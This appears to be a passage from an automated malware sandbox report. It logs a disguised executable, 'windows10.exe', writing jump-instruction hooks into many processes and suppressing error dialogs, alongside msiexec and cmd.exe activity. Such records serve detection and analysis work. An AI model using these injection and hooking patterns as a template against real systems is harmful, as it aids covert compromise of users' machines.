            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 7216 base: 76F02F90 value: E9 7A D0 6F 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Memory written: PID: 7216 base: 630005 value: E9 2B BA 89 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 76ECBA30 value: E9 DA 45 76 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 690008 value: E9 8B 8E 88 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 76F18E90 value: E9 80 71 77 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 3A00005 value: E9 8B 4D 1F 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 75BF4D90 value: E9 7A B2 E0 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 3A10005 value: E9 EB EB 1F 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 75C0EBF0 value: E9 1A 14 E0 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 3A20005 value: E9 8B 8A 5B 71 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 74FD8A90 value: E9 7A 75 A4 8E Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 3A30005 value: E9 2B 02 5D 71 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 75000230 value: E9 DA FD A2 8E Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 6A0005 value: E9 8B 2F 86 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 76F02F90 value: E9 7A D0 79 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 38C0005 value: E9 2B BA 60 73 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 76ECBA30 value: E9 DA 45 9F 8C Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 38D0008 value: E9 8B 8E 64 73 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 76F18E90 value: E9 80 71 9B 8C Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 3A00005 value: E9 8B 4D 1F 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 75BF4D90 value: E9 7A B2 E0 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 3A10005 value: E9 EB EB 1F 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 75C0EBF0 value: E9 1A 14 E0 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 3A30005 value: E9 8B 8A 5A 71 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 74FD8A90 value: E9 7A 75 A5 8E Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 3A40005 value: E9 2B 02 5C 71 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 75000230 value: E9 DA FD A3 8E Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 6D0005 value: E9 8B 2F 83 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 76F02F90 value: E9 7A D0 7C 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 37C0005 value: E9 2B BA 70 73 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 76ECBA30 value: E9 DA 45 8F 8C Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 37D0008 value: E9 8B 8E 74 73 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 76F18E90 value: E9 80 71 8B 8C Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 3A00005 value: E9 8B 4D 1F 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 75BF4D90 value: E9 7A B2 E0 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 3A10005 value: E9 EB EB 1F 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 75C0EBF0 value: E9 1A 14 E0 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 3A20005 value: E9 8B 8A 5B 71 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 74FD8A90 value: E9 7A 75 A4 8E Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 3A30005 value: E9 2B 02 5D 71 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 75000230 value: E9 DA FD A2 8E Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 600005 value: E9 8B 2F 90 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 76F02F90 value: E9 7A D0 6F 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 740005 value: E9 2B BA 78 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 76ECBA30 value: E9 DA 45 87 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 750008 value: E9 8B 8E 7C 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 76F18E90 value: E9 80 71 83 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 770005 value: E9 8B 4D 48 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 75BF4D90 value: E9 7A B2 B7 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 3800005 value: E9 EB EB 40 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 75C0EBF0 value: E9 1A 14 BF 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 3810005 value: E9 8B 8A 7C 71 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 74FD8A90 value: E9 7A 75 83 8E Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 3820005 value: E9 2B 02 7E 71 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 75000230 value: E9 DA FD 81 8E Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 7E0005 value: E9 8B 2F 72 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 76F02F90 value: E9 7A D0 8D 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 800005 value: E9 2B BA 6C 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 76ECBA30 value: E9 DA 45 93 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 37D0008 value: E9 8B 8E 74 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 76F18E90 value: E9 80 71 8B 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 3800005 value: E9 8B 4D 3F 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 75BF4D90 value: E9 7A B2 C0 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 3810005 value: E9 EB EB 3F 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 75C0EBF0 value: E9 1A 14 C0 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 3820005 value: E9 8B 8A 7B 71
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 74FD8A90 value: E9 7A 75 84 8E
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 3830005 value: E9 2B 02 7D 71
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 75000230 value: E9 DA FD 82 8E
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 2570005 value: E9 8B 2F 99 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 76F02F90 value: E9 7A D0 66 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 2590005 value: E9 2B BA 93 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 76ECBA30 value: E9 DA 45 6C 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 25A0008 value: E9 8B 8E 97 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 76F18E90 value: E9 80 71 68 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 26D0005 value: E9 8B 4D 52 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 75BF4D90 value: E9 7A B2 AD 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 26E0005 value: E9 EB EB 52 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 75C0EBF0 value: E9 1A 14 AD 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 26F0005 value: E9 8B 8A 8E 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 74FD8A90 value: E9 7A 75 71 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 2700005 value: E9 2B 02 90 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 75000230 value: E9 DA FD 6F 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 6D0005 value: E9 8B 2F 83 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 76F02F90 value: E9 7A D0 7C 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 840005 value: E9 2B BA 68 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 76ECBA30 value: E9 DA 45 97 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 850008 value: E9 8B 8E 6C 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 76F18E90 value: E9 80 71 93 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 870005 value: E9 8B 4D 38 75
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 75BF4D90 value: E9 7A B2 C7 8A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 880005 value: E9 EB EB 38 75
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 75C0EBF0 value: E9 1A 14 C7 8A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 890005 value: E9 8B 8A 74 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 74FD8A90 value: E9 7A 75 8B 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 8A0005 value: E9 2B 02 76 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 75000230 value: E9 DA FD 89 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 6E0005 value: E9 8B 2F 82 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 76F02F90 value: E9 7A D0 7D 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 740005 value: E9 2B BA 78 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 76ECBA30 value: E9 DA 45 87 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 750008 value: E9 8B 8E 7C 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 76F18E90 value: E9 80 71 83 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 770005 value: E9 8B 4D 48 75
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 75BF4D90 value: E9 7A B2 B7 8A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 780005 value: E9 EB EB 48 75
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 75C0EBF0 value: E9 1A 14 B7 8A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 790005 value: E9 8B 8A 84 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 74FD8A90 value: E9 7A 75 7B 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 25E0005 value: E9 2B 02 A2 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 75000230 value: E9 DA FD 5D 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 2420005 value: E9 8B 2F AE 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 76F02F90 value: E9 7A D0 51 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 2440005 value: E9 2B BA A8 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 76ECBA30 value: E9 DA 45 57 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 2450008 value: E9 8B 8E AC 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 76F18E90 value: E9 80 71 53 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 25C0005 value: E9 8B 4D 63 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 75BF4D90 value: E9 7A B2 9C 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 25D0005 value: E9 EB EB 63 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 75C0EBF0 value: E9 1A 14 9C 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 25E0005 value: E9 8B 8A 9F 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 74FD8A90 value: E9 7A 75 60 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 25F0005 value: E9 2B 02 A1 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 75000230 value: E9 DA FD 5E 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 6E0005 value: E9 8B 2F 82 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 76F02F90 value: E9 7A D0 7D 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 740005 value: E9 2B BA 78 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 76ECBA30 value: E9 DA 45 87 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 2590008 value: E9 8B 8E 98 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 76F18E90 value: E9 80 71 67 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 25B0005 value: E9 8B 4D 64 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 75BF4D90 value: E9 7A B2 9B 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 25C0005 value: E9 EB EB 64 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 75C0EBF0 value: E9 1A 14 9B 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 25D0005 value: E9 8B 8A A0 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 74FD8A90 value: E9 7A 75 5F 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 25E0005 value: E9 2B 02 A2 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 75000230 value: E9 DA FD 5D 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 2420005 value: E9 8B 2F AE 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 76F02F90 value: E9 7A D0 51 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 2480005 value: E9 2B BA A4 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 76ECBA30 value: E9 DA 45 5B 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 2490008 value: E9 8B 8E A8 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 76F18E90 value: E9 80 71 57 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 24B0005 value: E9 8B 4D 74 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 75BF4D90 value: E9 7A B2 8B 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 24C0005 value: E9 EB EB 74 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 75C0EBF0 value: E9 1A 14 8B 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 24D0005 value: E9 8B 8A B0 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 74FD8A90 value: E9 7A 75 4F 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 24E0005 value: E9 2B 02 B2 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 75000230 value: E9 DA FD 4D 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 600005 value: E9 8B 2F 90 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 76F02F90 value: E9 7A D0 6F 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 39D0005 value: E9 2B BA 4F 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 76ECBA30 value: E9 DA 45 B0 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 39E0008 value: E9 8B 8E 53 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 76F18E90 value: E9 80 71 AC 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 3A00005 value: E9 8B 4D 1F 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 75BF4D90 value: E9 7A B2 E0 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 3A10005 value: E9 EB EB 1F 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 75C0EBF0 value: E9 1A 14 E0 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 3A20005 value: E9 8B 8A 5B 71
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 74FD8A90 value: E9 7A 75 A4 8E
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 3A30005 value: E9 2B 02 5D 71
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 75000230 value: E9 DA FD A2 8E
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
